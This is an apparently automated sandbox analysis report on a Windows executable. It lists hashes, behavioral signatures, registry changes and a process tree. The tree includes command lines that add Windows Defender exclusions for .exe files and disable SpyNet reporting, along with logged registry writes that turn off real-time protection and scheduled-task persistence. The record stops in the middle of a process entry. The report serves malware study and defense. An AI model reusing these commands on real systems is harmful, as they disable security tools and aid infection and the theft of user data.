Analysis
max time kernel: 129s
max time network: 133s
platform: windows7_x64
resource: win7-20220901-en
resource tags: arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
submitted: 06/02/2023, 10:56
Static task: static1
Behavioral task: behavioral1
Sample: 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe
Resource: win7-20220901-en
General
Target: 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe
Size: 7.3MB
MD5: e9df6a41ca4941817e0da65dd35d6508
SHA1: d1efb6b9745f5fcf6f34a0e4f7d148133a4289eb
SHA256: 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c
SHA512: 7b850ea47e68386168db3d64e094347ebb87717d690a395352084cf8dd334449f382dff75eba04770e112ec85f742204d4ac592a1513327c5588c10f28490f54
SSDEEP: 196608:91OTdISgFWHU76tSdBQ2EfgFLfCceIqTMf:3OTGy0WS/QloFLbe+
Malware Config
Signatures
Modifies Windows Defender Real-time Protection settings
description | ioc | Process
- Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
description | ioc | Process
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JuPVqtTuU = "0" | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wRZxVByAcqfAC = "0" | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hRSVwMivPDBwjMVB = "0" | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dDIGKoNsMZUYTlNI = "0" | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dDIGKoNsMZUYTlNI = "0" | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dDIGKoNsMZUYTlNI = "0" | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\phVJOPZyZJOU2 = "0" | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR = "0" | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\phVJOPZyZJOU2 = "0" | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wRZxVByAcqfAC = "0" | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JuPVqtTuU = "0" | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NCzfTsUHwfUn = "0" | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hRSVwMivPDBwjMVB = "0" | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC = "0" | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\LnqiWCjpVUdcMEyBC = "0" | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\dDIGKoNsMZUYTlNI = "0" | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NCzfTsUHwfUn = "0" | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR = "0" | reg.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Blocklisted process makes network request 1 IoCs
flow | pid | Process
- 21 | 2016 | rundll32.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
- Key value queried | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation | DIgdmmJ.exe
Executes dropped EXE 4 IoCs
pid | Process
- 1068 | Install.exe
- 2004 | Install.exe
- 1956 | XXlxCEo.exe
- 1044 | DIgdmmJ.exe
Loads dropped DLL 12 IoCs
pid | Process
- 1408 | 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe
- 1068 | Install.exe (4 entries)
- 2004 | Install.exe (3 entries)
- 2016 | rundll32.exe (4 entries)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension 1 IoCs
description | ioc | Process
- File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | DIgdmmJ.exe
Drops file in System32 directory 19 IoCs
description | ioc | Process
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 | DIgdmmJ.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | DIgdmmJ.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 | DIgdmmJ.exe
- File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | DIgdmmJ.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | DIgdmmJ.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_450C63FC50977E21DE9DE54EB1509725 | DIgdmmJ.exe
- File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | DIgdmmJ.exe
- File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
- File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | XXlxCEo.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | DIgdmmJ.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | rundll32.exe
- File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | XXlxCEo.exe
- File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
- File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | DIgdmmJ.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_7638F332B8B62A320F9A599D313334B6 | DIgdmmJ.exe
- File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
- File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | XXlxCEo.exe
Drops file in Program Files directory 13 IoCs
description | ioc | Process
- File created | C:\Program Files (x86)\phVJOPZyZJOU2\FBIXlpX.xml | DIgdmmJ.exe
- File created | C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR\mrrqbOR.dll | DIgdmmJ.exe
- File created | C:\Program Files (x86)\sZsEQTjkuyBBMtXryyR\dgoNAPG.xml | DIgdmmJ.exe
- File created | C:\Program Files (x86)\wRZxVByAcqfAC\wJaHoYc.xml | DIgdmmJ.exe
- File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | DIgdmmJ.exe
- File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | DIgdmmJ.exe
- File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | DIgdmmJ.exe
- File created | C:\Program Files (x86)\JuPVqtTuU\yAawgAz.xml | DIgdmmJ.exe
- File created | C:\Program Files (x86)\phVJOPZyZJOU2\kXuqSBbJHAqRv.dll | DIgdmmJ.exe
- File created | C:\Program Files (x86)\wRZxVByAcqfAC\uYaROYg.dll | DIgdmmJ.exe
- File created | C:\Program Files (x86)\NCzfTsUHwfUn\DbvFZFu.dll | DIgdmmJ.exe
- File created | C:\Program Files (x86)\JuPVqtTuU\XqBJAR.dll | DIgdmmJ.exe
- File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | DIgdmmJ.exe
Drops file in Windows directory 4 IoCs
description | ioc | Process
- File created | C:\Windows\Tasks\bsajrHInQFlcwYICLj.job | schtasks.exe
- File created | C:\Windows\Tasks\ygwXmmYWmIOQZqgey.job | schtasks.exe
- File created | C:\Windows\Tasks\HnhGGmYUcuANzZs.job | schtasks.exe
- File created | C:\Windows\Tasks\ClHbhijVssadMpWzU.job | schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
- 1932 | schtasks.exe
- 1464 | schtasks.exe
- 1688 | schtasks.exe
- 1952 | schtasks.exe
- 604 | schtasks.exe
- 996 | schtasks.exe
- 1092 | schtasks.exe
- 436 | schtasks.exe
- 1784 | schtasks.exe
- 916 | schtasks.exe
- 1096 | schtasks.exe
- 1356 | schtasks.exe
- 972 | schtasks.exe
Enumerates system info in registry 2 TTPs 4 IoCs
description | ioc | Process
- Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
- Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Modifies data under HKEY_USERS 64 IoCs
description | ioc | Process
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-f2-bf-f9-a9-5d\WpadDecisionReason = "1" | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | DIgdmmJ.exe
- Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CE4FE25D-CB12-41E0-8834-D2BDB6C0A482}\WpadNetworkName = "Network 2" | DIgdmmJ.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CE4FE25D-CB12-41E0-8834-D2BDB6C0A482}\WpadDecision = "0" | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | DIgdmmJ.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | rundll32.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-f2-bf-f9-a9-5d\WpadDecisionReason = "1" | rundll32.exe
- Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | DIgdmmJ.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | DIgdmmJ.exe
- Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-f2-bf-f9-a9-5d\WpadDecisionTime = 4022e4e9193ad901 | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | wscript.exe
- Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | rundll32.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | wscript.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | wscript.exe
- Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | DIgdmmJ.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CE4FE25D-CB12-41E0-8834-D2BDB6C0A482}\WpadDecisionReason = "1" | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | rundll32.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host | wscript.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | DIgdmmJ.exe
- Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0018000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | rundll32.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-f2-bf-f9-a9-5d\WpadDecision = "0" | rundll32.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | DIgdmmJ.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-f2-bf-f9-a9-5d\WpadDecision = "0" | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b6-f2-bf-f9-a9-5d | rundll32.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CE4FE25D-CB12-41E0-8834-D2BDB6C0A482}\b6-f2-bf-f9-a9-5d | rundll32.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CE4FE25D-CB12-41E0-8834-D2BDB6C0A482}\b6-f2-bf-f9-a9-5d | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | wscript.exe
- Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | DIgdmmJ.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | DIgdmmJ.exe
- Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | rundll32.exe
- Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | rundll32.exe
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid | Process
- 456 | powershell.EXE (3 entries)
- 856 | powershell.EXE (3 entries)
- 1104 | powershell.EXE (3 entries)
- 1464 | powershell.EXE (3 entries)
- 1044 | DIgdmmJ.exe (17 entries)
Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
- Token: SeDebugPrivilege | 456 | powershell.EXE
- Token: SeDebugPrivilege | 856 | powershell.EXE
- Token: SeDebugPrivilege | 1104 | powershell.EXE
- Token: SeDebugPrivilege | 1464 | powershell.EXE
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
- PID 1408 wrote to memory of 1068 | 1408 | 627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe | 27 (7 entries)
- PID 1068 wrote to memory of 2004 | 1068 | Install.exe | 28 (7 entries)
- PID 2004 wrote to memory of 1640 | 2004 | Install.exe | 31 (7 entries)
- PID 2004 wrote to memory of 1072 | 2004 | Install.exe | 32 (7 entries)
- PID 1640 wrote to memory of 1436 | 1640 | forfiles.exe | 33 (7 entries)
- PID 1072 wrote to memory of 1520 | 1072 | forfiles.exe | 35 (7 entries)
- PID 1520 wrote to memory of 1444 | 1520 | cmd.exe | 36 (7 entries)
- PID 1436 wrote to memory of 2024 | 1436 | cmd.exe | 37 (7 entries)
- PID 1520 wrote to memory of 1104 | 1520 | cmd.exe | 39 (6 entries)
- PID 1436 wrote to memory of 812 | 1436 | cmd.exe | 38 (2 entries)
Processes
C:\Users\Admin\AppData\Local\Temp\627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\627f94066e4429d51827ea329dfc3a2185bf42a2617cbca68e89e3ee4029c48c.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID: 1408

  C:\Users\Admin\AppData\Local\Temp\7zS60A.tmp\Install.exe
    Command line: .\Install.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID: 1068

    C:\Users\Admin\AppData\Local\Temp\7zSABB.tmp\Install.exe
      Command line: .\Install.exe /S /site_id "525403"
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in System32 directory
      - Enumerates system info in registry
      - Suspicious use of WriteProcessMemory
      PID: 2004

      C:\Windows\SysWOW64\forfiles.exe
        Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        - Suspicious use of WriteProcessMemory
        PID: 1640

        C:\Windows\SysWOW64\cmd.exe
          Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
          - Suspicious use of WriteProcessMemory
          PID: 1436

          \??\c:\windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
            PID: 2024

          \??\c:\windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
            PID: 812

      C:\Windows\SysWOW64\forfiles.exe
        Command line: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        - Suspicious use of WriteProcessMemory
        PID: 1072

        C:\Windows\SysWOW64\cmd.exe
          Command line: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
          - Suspicious use of WriteProcessMemory
          PID: 1520

          \??\c:\windows\SysWOW64\reg.exe
            Command line: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
            PID: 1444

          \??\c:\windows\SysWOW64\reg.exe
